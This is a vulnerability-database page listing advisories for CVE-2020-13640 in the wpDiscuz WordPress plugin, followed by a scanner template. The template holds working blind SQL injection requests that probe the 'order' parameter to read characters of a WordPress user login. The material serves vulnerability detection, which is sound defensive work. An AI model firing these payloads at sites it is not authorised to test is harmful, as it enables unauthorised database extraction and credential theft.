| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| WordPress gVectors wpDiscuz plugin SQL Injection Vulnerability | 19 Jun 202000:00 | – | cnvd | |
| WordPress gVectors wpDiscuz Plugin SQL Injection (CVE-2020-13640) | 15 Jul 202000:00 | – | checkpoint_advisories | |
| CVE-2020-13640 | 18 Jun 202014:34 | – | cve | |
| CVE-2020-13640 | 18 Jun 202014:34 | – | cvelist | |
| CVE-2020-13640 | 18 Jun 202015:15 | – | nvd | |
| WordPress wpDiscuz Plugin < 5.3.6 SQLi Vulnerability | 2 May 202300:00 | – | openvas | |
| CVE-2020-13640 | 18 Jun 202015:15 | – | osv | |
| WordPress wpDiscuz plugin <= 5.3.5 - Unauthenticated SQL Injection (SQLi) vulnerability | 12 Jun 202000:00 | – | patchstack | |
| Sql injection | 18 Jun 202015:15 | – | prion | |
| PT-2020-13630 | 18 Jun 202000:00 | – | ptsecurity |
id: CVE-2020-13640
info:
name: wpDiscuz <= 5.3.5 - SQL Injection
author: Sourabh-Sahu
severity: critical
description: |
A SQL injection issue in the gVectors wpDiscuz plugin 5.3.5 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the order parameter of a wpdLoadMoreComments request.
impact: |
Unauthenticated attackers can execute arbitrary SQL commands to extract database contents including user credentials, posts, and sensitive WordPress configuration data.
remediation: |
Upgrade to wpDiscuz version 5.3.6 or later.
reference:
- https://github.com/asterite3/CVE-2020-13640
- https://nvd.nist.gov/vuln/detail/CVE-2020-13640
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-13640
epss-score: 0.12706
epss-percentile: 0.95796
cwe-id: CWE-89
cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
verified: true
vendor: gvectors
product: wpdiscuz
fofa-query: body="/wp-content/plugins/wpdiscuz"
tags: cve,cve2020,wordpress,wp,wp-plugin,wpdiscuz,sqli,vkev,vuln
flow: |
http(1)
set("postid", iterate(template.postid)[0])
http(2) && http(3)
http:
- raw:
- |
GET /wp-json/wp/v2/comments HTTP/1.1
Host: {{Host}}
stop-at-first-match: true
extractors:
- type: regex
name: postid
part: body
group: 1
regex:
- 'post"\s*:\s*([0-9]+)'
internal: true
- raw:
- |
POST /wp-content/plugins/wpdiscuz/utils/ajax/wpdiscuz-ajax.php HTTP/1.1
Host: {{Host}}
Content-Type: application/x-www-form-urlencoded
Connection: close
action=wpdLoadMoreComments&offset=1&orderBy=comment_date_gmt&order=, (SELECT CASE WHEN (ORD(SUBSTRING((SELECT user_login FROM wp_users LIMIT 0,1),1,1)) > 96) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END)=1 ASC #&lastParentId=&postId={{postid}}
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- 'comment_list":"<div id=\"wc-comm'
internal: true
- raw:
- |
POST /wp-content/plugins/wpdiscuz/utils/ajax/wpdiscuz-ajax.php HTTP/1.1
Host: {{Host}}
Content-Type: application/x-www-form-urlencoded
Connection: close
action=wpdLoadMoreComments&offset=1&orderBy=comment_date_gmt&order=, (SELECT CASE WHEN (ORD(SUBSTRING((SELECT user_login FROM wp_users LIMIT 0,1),1,1)) > 97) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END)=1 ASC #&lastParentId=&postId={{postid}}
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- '"comment_list":null'
condition: and
# digest: 490a0046304402207971c3ff1b247ae7c3df26c20ae33d2b1e957d14047a9fd43188248785d3203802204a17411bf3e068618f1f5373b45ef932057f32371f30511e452480defbc78332:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation